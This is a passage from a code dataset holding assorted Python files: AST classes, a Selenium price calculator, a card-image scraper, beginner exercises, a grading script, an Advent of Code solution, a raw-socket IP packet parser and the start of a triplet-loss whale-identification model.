ln\n\n\nclass BinaryExprListAST:\n    def __init__(self, expr_list :list, ln):\n        self.expr_list = expr_list\n        self.ln = ln\n\n\nclass ForExprAST:\n    def __init__(self, init_list :AssignExprListAST,\n                 test :TestExprAST, update_list :BinaryExprListAST,\n                 block :BlockExprAST, ln):\n        self.init_list = init_list\n        self.test = test\n        self.update_list = update_list\n        self.block = block\n        self.ln = ln\n\n\nclass ThrowExprAST:\n    def __init__(self, expr :BinaryExprAST, ln :int):\n        self.expr = expr\n        self.ln = ln\n\n\nclass AssertExprAST:\n    def __init__(self, expr :TestExprAST, ln :int):\n        self.expr = expr\n        self.ln = ln\n\n\nclass TryCatchExprAST:\n    def __init__(self, try_block :BlockExprAST,\n                 catch_block :BlockExprAST,\n                 finally_block :BlockExprAST,\n                 name :str, ln :int):\n        self.try_block = try_block\n        self.catch_block = catch_block\n        self.finally_block = finally_block\n        self.name = name\n        self.ln = ln\n\n\nBINARY_AST_TYPES = (\n        CellAST,\n        PowerExprAST,\n        ModExprAST,\n        MuitDivExprAST,\n        BinaryExprAST,\n        DefineExprAST,\n        CallExprAST,\n        ArrayAST,\n        SubscriptExprAST,\n        MemberAccessAST,\n        AssignExprAST\n        )\n","sub_path":"core/asts.py","file_name":"asts.py","file_ext":"py","file_size_in_byte":8316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"213666703","text":"import copy, re, json, pyperclip, logging, tkinter as tk\n\nfrom selenium.common.exceptions import *\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\n\nimport configuration\nimport extended_tk as extk\n\n\nconfig = configuration.__dict__[\"calculator\"]\n\nclass Calculator(tk.Toplevel):\n    def __init__(self, master, driver, cnf={}, **kw):\n        tk.Toplevel.__init__(self, master, cnf, **kw)\n        \n        self.title(\"Calculator\")        \n        \n        self.driver = driver\n        self.buttons = {} \n        self.entries = {} \n        self.options_readonly = {}\n        self.options_entry = {} \n\n        self.create_widgets()\n    # main functions    \n    def create_widgets(self):\n        buttons = self.buttons\n        entries = self.entries \n        driver = self.driver\n        html = driver.page_source\n        # price label\n        entries[\"product price label\"] = extk.Entry(self, state=\"readonly\", textvariable=tk.StringVar(), width=5, bd=0, justify=\"left\")\n        entries[\"product price label\"].textvariable.set(\"price: \")\n        entries[\"product price label\"].grid(row=0, sticky=\"w\"+\"e\")\n        # price entry\n        entries[\"product price\"] = extk.Entry(self, textvariable=tk.StringVar(), width=6, justify=\"center\")\n        entries[\"product price\"].grid(row=0, column=1, sticky=\"w\"+\"e\")\n        entries[\"product price\"].bind(\"\", self.total_copy)\n        try:\n            product_price_element = driver.find_element(By.CLASS_NAME, \"product-price-value\")\n            entries[\"product price\"].textvariable.set(\"%s\" % extk.string_to_float(product_price_element.text))        \n        except:\n            logging.info(\"no price in the window: %s\" % driver.current_url.split(\"?\")[0])\n        # shipping label\n        entries[\"shipping label\"] = extk.Entry(self, state=\"readonly\", textvariable=tk.StringVar(), width=10, bd=0, justify=\"right\")\n        entries[\"shipping label\"].textvariable.set(\"ships: \")\n        entries[\"shipping label\"].grid(row=0, column=2, sticky=\"w\"+\"e\")\n        # shipping entry\n        entries[\"shipping price\"] = extk.Entry(self, textvariable=tk.StringVar(), width=7, justify=\"center\")\n        entries[\"shipping price\"].grid(row=0, column=3, sticky=\"w\"+\"e\")\n        entries[\"shipping price\"].bind(\"\", self.total_copy)\n        try:\n            shipping_price_element = driver.find_element(By.CLASS_NAME, \"product-shipping-price\")\n            entries[\"shipping price\"].textvariable.set(\"%s\" % extk.string_to_float(shipping_price_element.text))        \n        except:\n            logging.info(\"no shipping in the window: %s\" % driver.current_url.split(\"?\")[0])\n        # options and recalculate buttons\n        buttons[\"options\"] = tk.Button(self, text=\"options\", command=lambda: self.options_rec())\n        buttons[\"options\"].grid(row=1, column=0, sticky=\"w\"+\"e\")\n        buttons[\"all\"] = tk.Button(self, text=\"all\", command=lambda: self.recalculate_all())\n        buttons[\"all\"].grid(row=1, column=1, pady=3, sticky=\"w\"+\"e\")\n        # total label\n        entries[\"total label\"] = extk.Entry(self, state=\"readonly\", textvariable=tk.StringVar(), width=10, bd=0, justify=\"right\")\n        entries[\"total label\"].textvariable.set(\"total: \")\n        entries[\"total label\"].grid(row=1, column=2, sticky=\"w\"+\"e\")\n        # total entry\n        entries[\"total price\"] = extk.Entry(self, textvariable=tk.StringVar(), width=7, justify=\"center\")\n        entries[\"total price\"].grid(row=1, column=3, sticky=\"w\"+\"e\")\n        entries[\"total price\"].bind(\"\", self.options_enter_pressed)\n        self.total_copy()\n        # options labels and entries\n        if \"aliexpress\" in driver.current_url:\n            self.options_aliexpress()        \n        if \"nesky\" in driver.current_url:\n            self.options_nes()\n    def options_rec(self):\n        readonlies = self.options_readonly\n        entries = self.options_entry\n        driver = self.driver        \n        driver.switch_to.window(\"active\")\n\n        entity_elements = driver.find_elements(By.CSS_SELECTOR, \".option-block > div:nth-child(2) > span\")\n        entities = [element.text for element in entity_elements]\n        updates = driver.find_elements(By.CSS_SELECTOR, \".option-block > div.edit-buttons > i.fa.fa-pencil\")\n        entries = dict([(readonly.textvariable.get(), entry.get()) for readonly, entry in zip(readonlies.values(), entries.values())])\n        # entering price\n        for index in range(len(entities)):\n            if entries.get(entities[index]):\n                driver.execute_script(\"var element = arguments[0]; element.scrollIntoView(); element.click()\", updates[index])\n                base_price = WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.CSS_SELECTOR, \"input[formcontrolname='base_price']\")))\n                base_price.send_keys(Keys.CONTROL + \"a\")\n                base_price.send_keys(extk.round_string(string=entries.get(entities[index])))\n                driver.execute_script(\"arguments[0].click()\", driver.find_element(By.CSS_SELECTOR, \"button[type='submit']\"))\n                WebDriverWait(driver, 5).until(EC.invisibility_of_element((By.CSS_SELECTOR, \"button[type='submit']\")))\n        # recalculate \n        recalculates = driver.find_elements(By.CSS_SELECTOR, \"span[title='Recalculate']\")\n        recalculated = 0\n        for index in range(len(entities)):\n            if entries.get(entities[index]):\n                driver.execute_script(\"arguments[0].click()\", recalculates[index])\n                recalculated += 1\n        logging.info(\"recalculated: %d/%d\" % (recalculated, len(recalculates)))\n    def recalculate_all(self):\n        readonlies = self.options_readonly\n        entries = self.options_entry\n        driver = self.driver\n        driver.switch_to.window(\"active\")\n\n        #variables    \n        updates = driver.find_elements(By.CSS_SELECTOR, \".option-block > div.edit-buttons > i.fa.fa-pencil\")\n        counts = min(len(updates), len(readonlies))\n        for index in range(counts):\n            if entries[\"%d entry\" % index].get():\n                driver.execute_script(\"var element = arguments[0]; element.scrollIntoView(); element.click()\", updates[index])\n                base_price = WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.CSS_SELECTOR, \"input[formcontrolname='base_price']\")))\n                base_price.send_keys(Keys.CONTROL + \"a\")\n                base_price.send_keys(extk.round_string(string=entries[\"%d entry\" % index].get()))\n                driver.execute_script(\"arguments[0].click()\", driver.find_element(By.CSS_SELECTOR, \"button[type='submit']\"))   \n                WebDriverWait(driver, 5).until(EC.invisibility_of_element((By.CSS_SELECTOR, \"button[type='submit']\")))\n        # recalculate\n        recalculates = driver.find_elements(By.CSS_SELECTOR, \"span[title='Recalculate']\")\n        recalculated = 0\n        for index in range(counts):\n            if entries[\"%d entry\" % index].get():\n                driver.execute_script(\"arguments[0].click()\", recalculates[index])\n                recalculated += 1\n        logging.info(\"recalculated: %d/%d\" % (recalculated, len(recalculates)))\n    # service functions\n    def create_option_entries(self, text=\"\", price=\"\", event=None):\n        readonlies = self.options_readonly\n        entries = self.options_entry\n        row = len(readonlies) # or len(entries) the same\n        # readonly options\n        readonlies[\"%d suplier \" % row] = extk.Entry(self.options_frame, state=\"readonly\", textvariable=tk.StringVar(), width=15, bd=0, justify=\"left\")\n        readonlies[\"%d suplier \" % row].textvariable.set(text or \"%d price\" % (row + 1))\n        readonlies[\"%d suplier \" % row].grid(row=row, column=0, sticky=\"w\"+\"e\")\n        # entry options\n        entries[\"%d entry\" % row] = extk.Entry(self.options_frame, textvariable=tk.StringVar(), width=15, justify=\"center\")\n        entries[\"%d entry\" % row].grid(row=row, column=1, pady=2, sticky=\"w\"+\"e\")\n        entries[\"%d entry\" % row].insert(0, price)\n        # binds\n        entries[\"%d entry\" % row].bind('', lambda event: self.options_enter_pressed(event=event))\n    def options_aliexpress(self):\n        rec_entries = self.entries\n        options_readonly = self.options_readonly\n        options_entry = self.options_entry\n        driver = self.driver\n        \n        try: driver.current_url\n        except NoSuchWindowException:\n            logging.warning(\"window closed\"); return\n        # variables\n        html = driver.page_source\n        search = re.compile('(\\[{\"isShowTypeColor\".*\\]),\"skuPriceList\"').search(html)\n        orders = json.loads(search.group(1) if search else \"[]\")\n        search = re.compile('(\\[{\"skuAttr\".*?\\}\\}\\])').search(html)\n        prices = json.loads(search.group(1) if search else \"[]\")\n        options_sku = []\n        options_price = []\n        selected_options = []\n        # options sku\n        for order in orders:\n            for skuPropertyValue in order[\"skuPropertyValues\"]:\n                options_sku.append({skuPropertyValue[\"propertyValueDisplayName\"] : skuPropertyValue[\"propertyValueId\"]})\n        # options price\n        for price in prices:\n            try:\n                options_price.append({price[\"skuPropIds\"] : price[\"skuVal\"][\"skuActivityAmount\"][\"value\"]})\n            except KeyError:\n                options_price.append({price[\"skuPropIds\"] : price[\"skuVal\"][\"skuAmount\"][\"value\"]})\n        options_price = extk.price_sort(orders, options_price)\n        # selected options\n        sku_buttons = driver.find_elements(By.CLASS_NAME, \"sku-property-item\")\n        for button in sku_buttons:\n            if \"selected\" in button.get_attribute(\"class\"):\n                selected_options.append(options_sku[sku_buttons.index(button)])\n        # destroy old frame and create new\n        if getattr(self, \"options_frame\", None):\n            self.options_frame.destroy()\n            options_readonly.clear()\n            options_entry.clear()\n        self.options_frame = tk.LabelFrame(self, text=\"options\", padx=5, pady=5)\n        self.options_frame.grid(row=3, columnspan=10, sticky=\"n\"+\"s\"+\"w\"+\"e\")\n            # create options entry\n        for amount in copy.deepcopy(options_price):\n            skuIds, price = amount.popitem()\n            for selected in selected_options:\n                selected_sku = str(list(selected.values())[0])\n                if selected_sku in skuIds:\n                    skuIds = skuIds.replace(\",\" + selected_sku, \"\").replace(selected_sku + \",\", \"\")\n                else:\n                    skuIds = \"empty\"\n            if skuIds != \"empty\":\n                # display price\n                product = int(price.replace(\".\", \"\"))\n                shipping = rec_entries[\"shipping price\"].get() or \"0\"\n                shipping = int(shipping.replace(\",\", \"\").replace(\".\", \"\"))\n                price = int((product + shipping) * config[\"factor\"])\n                # replace sku value to sku name\n                skuNames = extk.skuValues_to_names(skuValues=skuIds, options_sku=options_sku)\n\n                self.create_option_entries(text = skuNames, price=price)\n    def options_nes(self):\n        driver = self.driver\n        # destroy old frame and create new\n        if getattr(self, \"options_frame\", None):\n            self.options_frame.destroy()\n            self.options_readonly.clear()\n            self.options_entry.clear()\n        self.options_frame = tk.LabelFrame(self, text=\"options\", padx=5, pady=5)\n        self.options_frame.grid(row=3, columnspan=10, sticky=\"n\"+\"s\"+\"w\"+\"e\")\n\n        entity_elements = driver.find_elements(By.CSS_SELECTOR, \".option-block > div:nth-child(2) > span\")\n        entities = [element.text for element in entity_elements]\n        for entity in entities:\n            self.create_option_entries(text=entity)\n    def total_copy(self, event=None):\n        rec_entries = self.entries\n        \n        product_price = rec_entries[\"product price\"].get() or \"0\"\n        shipping_price = rec_entries[\"shipping price\"].get() or \"0\"\n        product = int(product_price.replace(\",\", \"\").replace(\".\", \"\"))\n        shipping = int(shipping_price.replace(\",\", \"\").replace(\".\", \"\"))\n        total = int((product + shipping) * config[\"factor\"])\n        total_str = str(total or \"\")\n\n        rec_entries[\"total price\"].textvariable.set(total_str)\n        pyperclip.copy(total_str)               \n    def options_enter_pressed(self, event):\n        entries = self.options_entry\n        for name in entries:\n            text = event.widget.get()\n            entries[name].textvariable.set(text)\n\nif __name__ == \"__main__\":\n    import workhelper","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":12740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"573351533","text":"import urllib.request\nimport urllib.parse\nimport re\nimport os\nfrom bs4 import BeautifulSoup\n'''\nUpdate 1.1\n加入\n当检索时卡片不存在时,直接跳过\n默认保存目录为D:\n'''\ndef Schedule(a,b,c):\n    '''''\n    a:已经下载的数据块\n    b:数据块的大小\n    c:远程文件的大小\n   '''\n    per = 100.0 * a * b / c\n    if per > 100 :\n        per = 100\n    print('%.2f%%' % per)\n\nfileName = input('输入文件名:')\nfile = open(fileName)\ndata = file.read().splitlines()\nfor CardName in data:\n    ErrorMessage = CardName + '不存在'\n    if not len(CardName)==0 :\n        print(CardName)\n        # 1.输入中文卡名返回OurOCG卡牌站点\n        CardName_URL = urllib.parse.quote(CardName)\n        url = \"http://www.ourocg.cn/S.aspx?key=\" + CardName_URL\n        headers = ('User-Agent',\n                   'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11')\n        opener = urllib.request.build_opener()\n        opener.addheaders = [headers]\n        OCGSearch = opener.open(url).read()\n        OCGSearch = OCGSearch.decode('UTF-8')\n        OCGSearch = OCGSearch.split()\n        for lines in OCGSearch:\n            word = re.findall('/View-[0-9]+', lines)\n            if not (len(word) == 0):\n                ViewNum = ''.join(word)\n                break\n        if ((len(word) == 0)):\n            print(ErrorMessage)\n            continue\n\n        # 2.通过详细信息返回卡牌编号\n        url = 'http://www.ourocg.cn/Cards' + ViewNum\n        headers = ('User-Agent',\n                   'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11')\n        # opener = urllib.request.build_opener()\n        # opener.addheaders = [headers]\n        web = opener.open(url).read()\n        web = web.decode('UTF-8')\n        soup = BeautifulSoup(web, \"html.parser\")\n        title = ''.join(soup.title)\n        CardNum = re.findall('[0-9]+', title)\n        CardNum = ''.join(CardNum)\n        # 3.通过日语卡名检索Oreturn返回卡片pid\n        url = 'http://www.orenoturn.com/?mode=srh&cid=&keyword=' + CardNum\n        Ore_Web = urllib.request.urlopen(url).read()\n        Ore_Web = Ore_Web.decode('EUC-JP', 'ignore')  # euc-jp编码\n        soup = BeautifulSoup(Ore_Web, \"html.parser\")\n        for rows in soup.find_all('a'):\n            pid = re.findall('\\Wpid+\\W[0-9]+', rows.get('href'))\n            if not (len(pid) == 0):\n                pid = ''.join(pid)\n                break\n        if (len(pid)==0):\n            print(ErrorMessage)\n            continue\n\n\n        # 4.通过pid打开oreturn图片进行保存\n        url = \"http://www.orenoturn.com/\"\n        target = url + pid\n        web = urllib.request.urlopen(target).read()\n        html_doc = web.decode('EUC-JP', 'ignore')\n        soup = BeautifulSoup(html_doc, \"html.parser\")\n        pics = soup.find('meta', property='og:image')\n        CardName = CardName + '.jpg'\n        local = os.local = os.path.join('D:\\\\', CardName)\n        urllib.request.urlretrieve(pics['content'], local, Schedule)\n    else:\n        print('谢谢使用!')\n        break\nexit()\n\n","sub_path":"YgoSearchForOreTurnVer1.1.py","file_name":"YgoSearchForOreTurnVer1.1.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"51608699","text":"'''\n\nMove the code you previously wrote to calculate how many seconds are in a year into this file.\nThen execute it as a script to see the output printed to your console.\n\n'''\n\nDaysNum = 365\nHoursNum = 24\nMinutesNum = 60\nSecondsNum = 60\nSecondsinaYear = DaysNum * HoursNum * MinutesNum * SecondsNum\n\nprint (\"The number of seconds in a year is \")\nprint (SecondsinaYear)\n","sub_path":"01_python_fundamentals/01_02_seconds_years.py","file_name":"01_02_seconds_years.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"469950967","text":"\nfrom pyrob.api import *\n\n\n@task(delay=0.05)\ndef task_4_11():\n    move_down(1)\n    for j in range (1,14):\n       for i in range (j):\n           move_right(1)\n           fill_cell()\n       for i in range (j):\n          move_left(1)\n       move_down(1)\n    move_right(1)\n\n\nif __name__ == '__main__':\n    run_tasks()","sub_path":"task_21.py","file_name":"task_21.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"110651477","text":"# -*- encoding=utf-8 -*-\n\nimport socket\nfrom operate_system.pool import ThreadPool as tp\nfrom operate_system.task import AsyncTask\nimport json\n\nfrom parser import IPParser\n\nclass ProcessTask(AsyncTask):\n    def __init__(self, packet, *args, **kwargs) -> None:\n        super().__init__(func=self.process, *args, **kwargs)\n        self.packet = packet\n\n    def process(self):\n        ip_header = IPParser.parse(self.packet)\n        return ip_header\n\nclass Server:\n    def __init__(self) -> None:\n        # 工作协议类型,套接字类型,工作具体协议\n        self.sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, \n                                socket.IPPROTO_IP)\n        # 绑定自己的主机IP\n        self.ip = \"192.168.1.13\"\n        self.port = 8888\n        self.sock.bind((self.ip,self.port))\n\n        # 设置混杂模式,开启混杂模式\n        self.sock.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)\n\n        # 新建一个线程池\n        self.pool = tp(10)\n           \n    def loop_server(self):\n        while True:\n            # 接收\n            packet, addr = self.sock.recv(65535)\n            # 生成task\n            task = ProcessTask(packet)\n            # 提交任务\n            self.pool.put(task)\n            # 获取结果\n            result = task.get_result()\n            result = json.dumps(\n                result,\n                indent=4\n            )\n\nif __name__ == \"__main__\":\n    server = Server()\n    server.loop_server()","sub_path":"computer_network/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"633960377","text":"import datetime\nimport re\n\nfrom collections import namedtuple\nfrom operator import itemgetter, attrgetter\n\nSTATE_ASLEEP = \"asleep\"\nSTATE_AWAKE = \"awake\"\n\nRecord = namedtuple(\"Record\", [\"timestamp\", \"message\"])\n\ndef get_sleep_data(records):\n    \"\"\"Returns a list of per-minute records of sleep data grouped by guard id and date.\"\"\"\n    def get_minutes(begin, end):\n        \"\"\"Get length of [begin, end] interval in minutes.\"\"\"\n        return (end - begin).seconds // 60\n\n    records = sorted(records, key=attrgetter(\"message\"))\n    records.sort(key=attrgetter(\"timestamp\"))\n\n    guard_sleep = {}\n    current_guard_id = None\n    for idx, record in enumerate(records):\n        date_only = datetime.date(record.timestamp.year, record.timestamp.month, record.timestamp.day)\n        if record.message[:5] == \"Guard\":\n            current_guard_id = int(re.search(\"#([0-9]+)\", record.message).group(1))\n            if current_guard_id not in guard_sleep:\n                guard_sleep[current_guard_id] = {}\n            guard_sleep[current_guard_id][date_only] = record.timestamp.minute * [STATE_AWAKE]\n        elif record.message[:5] == \"wakes\":\n            number_of_minutes = get_minutes(records[idx-1].timestamp, record.timestamp)\n            guard_sleep[current_guard_id][date_only] += number_of_minutes * [STATE_ASLEEP]\n        elif record.message[:5] == \"falls\":\n            number_of_minutes = get_minutes(records[idx-1].timestamp, record.timestamp)\n            guard_sleep[current_guard_id][date_only] += number_of_minutes * [STATE_AWAKE]\n    return guard_sleep\n\ndef get_per_minute_sleep_data(sleep_data):\n    \"\"\"Returns a dictionary of per-minute total sleep (accross all days) data for each guard.\"\"\"\n    per_minute_sleep = {}\n    for guard_id in sleep_data.keys():\n        per_minute_sleep[guard_id] = 60 * [0]\n        for sleep_in_day in sleep_data[guard_id].values():\n            for minute, state in enumerate(sleep_in_day):\n                if state == STATE_ASLEEP:\n                    per_minute_sleep[guard_id][minute] += 1\n    return per_minute_sleep\n\ndef parse_input(input):\n    \"\"\"Returns a list of sleep records.\"\"\"\n    parsed_input = []\n    for line in input:\n        time = datetime.datetime.strptime(line.split(\"] \")[0][1:], \"%Y-%m-%d %H:%M\")\n        if time.hour != 0:\n            time += datetime.timedelta(1)\n            time = time.replace(hour=0, minute=0)\n        message = line.split(\"] \")[1]\n        parsed_input.append(Record(time, message))\n    return parsed_input\n\ndef first_star(input):\n    sleep_records = parse_input(input)\n    guard_sleep = get_sleep_data(sleep_records)\n    sleep_heatmap = get_per_minute_sleep_data(guard_sleep)\n    total_guard_sleep = {guard_id: sum(sleep_heatmap[guard_id]) for guard_id in guard_sleep.keys()}\n\n    guard_id_with_most_sleep = max(total_guard_sleep.items(), key=itemgetter(1))[0]\n    most_sleepy_minute = sleep_heatmap[guard_id_with_most_sleep].index(max(sleep_heatmap[guard_id_with_most_sleep]))\n    return guard_id_with_most_sleep * most_sleepy_minute\n\ndef second_star(input):\n    sleep_records = parse_input(input)\n    guard_sleep = get_sleep_data(sleep_records)\n    sleep_heatmap = get_per_minute_sleep_data(guard_sleep)\n\n    most_regular_minute_per_guard = {guard_id: max(enumerate(sleep_heatmap[guard_id]), key=itemgetter(1)) for guard_id in guard_sleep.keys()}\n    most_regular_sleeper = max(most_regular_minute_per_guard.items(), key=lambda x: x[1][1])[0]\n    most_regular_minute = most_regular_minute_per_guard[most_regular_sleeper][0]\n    return most_regular_sleeper * most_regular_minute\n","sub_path":"day04/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"217900800","text":"from ...Crawler.Fs import FileCrawler\nfrom ..Task import Task\nfrom .CreateDataTask import CreateDataTask\n\nclass AppendToVersionTask(CreateDataTask):\n    \"\"\"\n    Task for appending data to a version.\n    \"\"\"\n\n    def rootPath(self):\n        \"\"\"\n        Return the root path where the data directory and json files should exist.\n        \"\"\"\n        assert self.crawlers(), \"Need input crawlers to figure out root path.\"\n        return self.crawlers()[0].var(\"versionPath\")\n\n    def _perform(self):\n        \"\"\"\n        Perform the task.\n        \"\"\"\n        for crawler in self.crawlers():\n            if isinstance(crawler, FileCrawler):\n                self.addFile(crawler.var(\"filePath\"))\n\n        return super(AppendToVersionTask, self)._perform()\n\n\n# registering task\nTask.register(\n    'appendToVersion',\n    AppendToVersionTask\n)\n","sub_path":"src/lib/kombi/Task/Version/AppendToVersionTask.py","file_name":"AppendToVersionTask.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"397536953","text":"#1. 과목 점수를 입력하여 총점과 평균, 등급, 석차와 각 과목의 총점과 평균을 출력하는 프로그램입니다.\n#(이름과 각 과목, 총점, 평균, 등급, 석차는 1차원 배열입니다. 각 과목의 총점과 평균은 단순 변수입니다.)\n#(참고. 복수의 문자(스트링) 출력 시 %s형식을 사용합니다.)\n\n#   이름   국어   영어   수학   총점   평균   등급   석차\n#   홍길동   82       50     70     202       67.3   D       2\n#   허광균   50       60     90     200       66.7   D       3\n#   민선비   40       80     50       170       56.7   F       5\n#   광화문   60       70     70       200       66.7   D       3\n#   복지관   70       90     80       240    80.0   B       1\n#   총  점   302    350    360\n#   평  균   60.4   70.0   72.0\n\n# 과제 : 위의 자료를 바탕으로 각 과목별 점수를 2차원 배열로 작성하고,\n#        나머지 부분(총점, 평균, 등급, 석차)은 1차원 배열로 작성하여\n#        새로 프로그래밍 하시오\n\narr_name = ['홍길동', '허광균', '민선비', '광화문', '복지관']\n# 2차원 배열을 사용한 점수 등록\narr_point = [[82, 50, 70],\n            [50, 60, 90],\n            [40, 80, 50],\n            [60, 70, 70],\n            [70, 90, 80]]\n\n# 합, 평균을 1차원 배열을 이용하여 등록\nsum_student = [0, 0, 0, 0, 0]\nsum_subject = [0, 0, 0]\navg_student = [0, 0, 0, 0, 0]\navg_subject = [0, 0, 0]\n\n# 학생 별 점수의합 및 평균을 구하는 for문\nfor j in range (0, 5, 1) :\n    for i in range (0, 3, 1) :\n        sum_student[j] = sum_student[j] + arr_point[j][i]\n        avg_student[j] = sum_student[j] / 3\n\n# 등급을 지정하는 부분\ngrade = ['', '', '', '', '']\nfor i in range (0, 5, 1) :\n    if avg_student[i] >= 90 :\n        grade[i] = 'A'\n    elif avg_student[i] >= 80 :\n        grade[i] = 'B'\n    elif avg_student[i] >= 70 :\n        grade[i] = 'C'\n    elif avg_student[i] >= 60 :\n        grade[i] = 'D'\n    else :\n        grade[i] = 'F'\n\n# 순위를 지정하는 부분\nrank = [1 for i in range(5)]\nfor i in range(0, 5):\n    for j in range(0, 5):\n        if sum_student[i] < sum_student[j]:\n            rank[i] = rank[i] + 1\n\n# 과목별 합계와 평균을 구하는 부분\nfor i in range (0, 3, 1) :\n    for j in range (0, 5, 1) :\n        sum_subject[i] = sum_subject[i] + arr_point[j][i]\n        avg_subject[i] = sum_subject[i] / 5\n\n# 출력부분(각 항목의 이름을 나타내는 부분)\nprint(\" 이름   국어   영어   수학   총점   평균   등급   석차\")\n\n# 출력부분(각 학생들의 이름, 과목별 점수, 합계, 평균, 등급, 석차)\nfor j in range (0, 5, 1) :\n    print(arr_name[j], end=\" \")\n    for i in range (0, 3, 1) :\n        print(\"%5d\" % (arr_point[j][i]), end = \"   \")\n    print(\"%5d\" % (sum_student[j]), end=\"    \")\n    print(\"%0.1f\" % (avg_student[j]), end=\"     \")\n    print(\"%s\" % (grade[j]), end=\"   \")\n    print(\"%5d\" % (rank[j]), end=\"\")\n    print(\"\")\n\n# 출력부분(각 과목별 점수의 합)\nprint(\"합  계 \",end=\"\")\nfor i in range (0, 3, 1) :\n    print(\"%5d  \" % sum_subject[i], end=\" \")\nprint(\"\")\n\n# 출력부분(각 과목별 점수의 평균)\nprint(\"평  균 \",end=\" \")\nfor i in range (0, 3, 1) :\n    print(\"%0.1f\" % avg_subject[i], end=\"    \")\nprint(\"\")","sub_path":"2-2/알고리즘/testP.py","file_name":"testP.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"198259851","text":"#part of the code is from https://github.com/maciejkula/triplet_recommendations_keras\n#based on code provided on Kaggle kernel at https://www.kaggle.com/CVxTz/beating-the-baseline-keras-lb-0-38\nimport numpy as np\nimport pandas as pd\nimport os\nimport sys\nimport glob\nimport threading\nfrom collections import defaultdict\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import NearestNeighbors\nfrom PIL import Image\nfrom keras import backend as K\nfrom keras import optimizers, losses, activations, models\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.layers import Embedding, Flatten, Input, merge\nfrom keras.layers import Conv2D, MaxPooling2D, Dense, GlobalMaxPooling2D\nfrom keras.layers import Convolution2D, Dropout, BatchNormalization, \\\n                            GlobalMaxPool2D, Concatenate, GlobalAveragePooling2D, Lambda\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler, EarlyStopping, ReduceLROnPlateau, TensorBoard, Callback\nfrom keras.applications.resnet50 import ResNet50\nfrom keras.preprocessing.image import random_rotation, random_shift, random_shear, random_zoom, \\\n                            random_channel_shift, transform_matrix_offset_center, img_to_array\n\nclass sample_gen(object):\n    def __init__(self, file_class_mapping, other_class = \"new_whale\"):\n        self.file_class_mapping= file_class_mapping\n        self.class_to_list_files = defaultdict(list)\n        self.list_other_class = []\n        self.list_all_files = list(file_class_mapping.keys())\n        self.range_all_files = list(range(len(self.list_all_files)))\n\n        for file, class_ in file_class_mapping.items():\n            if class_ == other_class:\n                self.list_other_class.append(file)\n            else:\n                self.class_to_list_files[class_].append(file)\n\n        self.list_classes = list(set(self.file_class_mapping.values()))\n        self.range_list_classes= range(len(self.list_classes))\n        \n        #FINAL add new_whale\n        self.class_weight = np.array([len(self.class_to_list_files[class_]) for class_ in self.list_classes])\n        self.class_weight = self.class_weight/np.sum(self.class_weight)\n\n    def get_sample(self):\n        class_idx = np.random.choice(self.range_list_classes, 1, p=self.class_weight)[0]\n        #FINAL not new whale, choose any two whales in class (could be same)\n        examples_class_idx = np.random.choice(range(len(self.class_to_list_files[self.list_classes[class_idx]])), 2)\n        positive_example_1, positive_example_2 = \\\n            self.class_to_list_files[self.list_classes[class_idx]][examples_class_idx[0]],\\\n            self.class_to_list_files[self.list_classes[class_idx]][examples_class_idx[1]]\n        #FINAL new whale, use same sample\n        \n        negative_example = None\n        while negative_example is None or \\\n                (self.file_class_mapping[negative_example] == self.file_class_mapping[positive_example_1]): #and self.file_class_mapping[positive_example_1] != \"new_whale\") or \\\n            negative_example_idx = np.random.choice(self.range_all_files, 1)[0]\n            negative_example = self.list_all_files[negative_example_idx]\n        return positive_example_1, negative_example, positive_example_2\n\nclass epochCallback(Callback):\n    def on_epoch_end(self, epoch, logs={}):\n        print(\"Epoch:\\t{}\\tval_loss:{}\".format(epoch, logs.get(\"val_loss\")), file=sys.stderr, flush=True)\n        return\n\n\nbatch_size = 8\ninput_shape = (256, 256)\nbase_path = \"./train/\"\ndef identity_loss(y_true, y_pred):\n\n    return K.mean(y_pred - 0 * y_true)\n\n\ndef bpr_triplet_loss(X):\n    positive_item_latent, negative_item_latent, user_latent = X\n    # BPR loss\n    loss = 1.0 - K.sigmoid(\n        K.sum(user_latent * positive_item_latent, axis=-1, keepdims=True) -\n        K.sum(user_latent * negative_item_latent, axis=-1, keepdims=True))\n\n    return loss\n\ndef get_base_model():\n    latent_dim = 1500\n    base_model = ResNet50(include_top=False, weights='imagenet')\n\n    x = base_model.output\n    x = GlobalMaxPooling2D()(x)\n    x = Dropout(0.5)(x)\n    dense_1 = Dense(latent_dim)(x)\n    normalized = Lambda(lambda  x: K.l2_normalize(x, axis=1))(dense_1)\n    